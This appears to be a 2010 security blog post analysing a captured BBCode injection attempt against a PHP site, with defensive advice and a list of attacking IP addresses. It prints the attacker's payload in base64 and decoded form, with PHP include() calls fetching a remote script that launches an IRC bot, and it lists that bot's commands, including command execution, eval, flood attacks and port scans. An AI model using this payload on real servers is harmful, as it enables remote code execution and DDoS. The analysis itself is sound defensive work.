Friday, July 9, 2010

The IRC Bot

Event Details


Date
9 July 2010

POST Values
author_name:
[php]echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die();[/php]

SERVER Values
HTTP_USER_AGENT: Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

What the hacker was hoping for

This is an interesting one as it seems that the hacker is trying to perform some type of BBCode injection and hope that the library that performs the BBCode formatting will translate and execute the php code enclosed by [php].

The php would then decode those encoded strings and execute something that looked a little like this:

[php]echo "eNdA" . php_uname() ."eNdA";
include("http://planetworkteam.fileave.com/ddos.txt??");
include("http://planetworkteam.fileave.com/ddos.txt??");; die();[/php]


The included remote files would then start up an IRC bot and connect to a remote IRC server where it would wait for commands from a controller. The list of commands this bot can perfom are as followed:

.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses exec() //execute a command
.sexec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.safe // test safe_mode (dvl)
.inbox // test inbox (dvl)
.conback // conect back (dvl)
.uname // return shell's uname using a php function (dvl)


The source code also contains an encoded Perl script used to connect and download data from a remote location and spawn bash shells (called "Data Cha0s Connect Back Backdoor").

How to prevent this


  • Sanitize your inputs

  • Properly configure any 3rd party libraries.
    • If a 3rd party library allows users to execute arbitrary code then you're asking for trouble.




What we know about the visitor
These attacks have come from numerous IP addresses (most likely compromised machines), so it won't help us identify the hacker.

Attacking Ips:
24.120.145.188
38.117.65.242
41.78.28.104
62.12.136.135
62.44.82.118
62.44.123.3
64.34.170.92
64.89.247.4
64.156.24.220
65.183.182.51
66.76.26.88
66.98.216.16
66.135.41.16
66.230.225.82
67.148.93.62
67.222.22.44
69.70.153.210
69.73.155.53
69.197.157.190
72.1.114.141
72.55.156.70
72.55.165.45
74.206.118.177
75.125.43.162
80.172.236.56
80.177.1.221
81.2.252.33
81.93.192.2
81.93.240.71
81.169.129.100
83.96.231.105
83.143.81.42
84.21.8.208
84.255.193.115
85.19.150.100
87.238.162.10
88.84.142.223
89.32.43.251
89.33.78.92
89.200.169.131
91.121.79.138
91.121.175.184
93.186.192.124
93.190.48.203
94.23.205.159
94.143.220.3
95.168.196.66
98.108.68.50
99.7.55.150
109.86.145.204
114.108.151.149
119.235.18.12
157.181.172.226
157.181.239.239
173.55.123.62
187.45.193.227
188.241.116.138
189.59.8.29
190.95.200.114
192.154.46.38
193.226.30.130
193.246.108.253
194.50.101.248
195.5.163.206
195.199.40.194
195.216.196.122
195.228.86.27
196.41.123.167
199.184.237.35
200.201.180.130
201.116.197.150
202.75.36.10
203.147.62.92
204.15.37.220
204.122.16.64
206.123.118.132
207.218.209.178
208.79.205.56
208.101.48.50
209.85.52.140
209.126.254.119
210.0.213.83
211.206.120.196
211.210.38.8
212.59.6.16
212.61.10.82
212.159.7.202
213.163.84.4
213.165.85.241
213.199.192.18
213.232.94.135
217.64.195.236
217.112.42.77
217.112.84.13
218.38.34.19
219.94.129.49


We can see the HTTP_USER_AGENT is rather unique and can be used to identify visits from the hackers scripts.





BrowserNetscape 4.7
OSSolaris
Languageru (Russian)


The source code of the IRC bot contains comments both in English and Portuguese. By the looks of it, the code was originally written by an English speaker and later adapted (based on variable names, location of comments, etc) by the Portuguese speaker.

What we do know is where this hacker and his bots hang out (IRC server and channels are listed in the source code).

Threat Level
Medium

Course of Action
If this has happened to you, do the following:


  • Take the server offline (if possible)

  • Check active process list for unknown scripts and kill them

  • Fix or remove the vulnerable library

  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.

  • If you don't use it yourself, block both inbound and outbound access to port 6667 (default IRC port)